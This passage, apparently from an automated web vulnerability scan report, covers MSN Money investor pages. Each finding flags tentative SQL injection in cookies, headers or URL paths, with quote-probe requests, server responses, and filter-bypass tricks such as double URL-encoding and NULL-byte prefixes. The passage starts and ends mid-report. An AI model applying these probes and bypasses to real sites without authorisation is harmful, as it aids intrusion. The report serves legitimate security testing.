Location: http://money.redacted/investing
Content-Length: 62

object moved <a href="http://money.msn.com/investing">here</a>

1.55. http://redacted/investor/home.aspx [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/home.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:03:26 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 18:03:27 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted/investing
Content-Length: 62

object moved <a href="http://money.msn.com/investing">here</a>

1.56. http://redacted/investor/market/exchangerates.aspx [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/exchangerates.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /investor/market/exchangerates.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:1427c"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:30 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/market/exchangerates.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:16:31 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.57. http://redacted/investor/market/exchangerates.aspx [Sample cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/exchangerates.aspx

Issue detail

The Sample cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Sample cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Sample cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/market/exchangerates.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:26 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/market/exchangerates.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.58. http://redacted/investor/market/treasuries.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/treasuries.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor%2527/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:153c9"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 18:05:47 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor%2527%2527/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:48 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

1.59. http://redacted/investor/market/treasuries.aspx [s_cc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/treasuries.aspx

Issue detail

The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /investor/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true%00'; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...
<script type="text/javascript">
   if(typeof(top.LogErr)!="undefined")window.onerror=top.LogErr;
</script>
...[SNIP]...

Request 2

GET /investor/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true%00''; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:33 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

1.60. http://redacted/investor/market/usindex.aspx [CC cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/usindex.aspx

Issue detail

The CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/market/usindex.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US'; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:32 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/market/usindex.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US''; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:32 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.61. http://redacted/investor/market/usindex.aspx [MC1 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/usindex.aspx

Issue detail

The MC1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MC1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the MC1 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/market/usindex.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:09 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/market/usindex.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527%2527; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:11 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.62. http://redacted/investor/market/worldmarkets.aspx [CULTURE cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/worldmarkets.aspx

Issue detail

The CULTURE cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CULTURE cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the CULTURE cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/market/worldmarkets.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US%2527; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:26 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/market/worldmarkets.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US%2527%2527; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.63. http://redacted/investor/market/worldmarkets.aspx [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/worldmarkets.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/market/worldmarkets.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Referer: http://www.google.com/search?hl=en&q='

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:1a400"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 18:05:30 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/market/worldmarkets.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:05:32 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.64. http://redacted/investor/market/worldmarkets.aspx [expid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/worldmarkets.aspx

Issue detail

The expid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the expid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/market/worldmarkets.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2';

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:18 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/market/worldmarkets.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2'';

Response 2

HTTP/1.1 200 OK
Connection: close
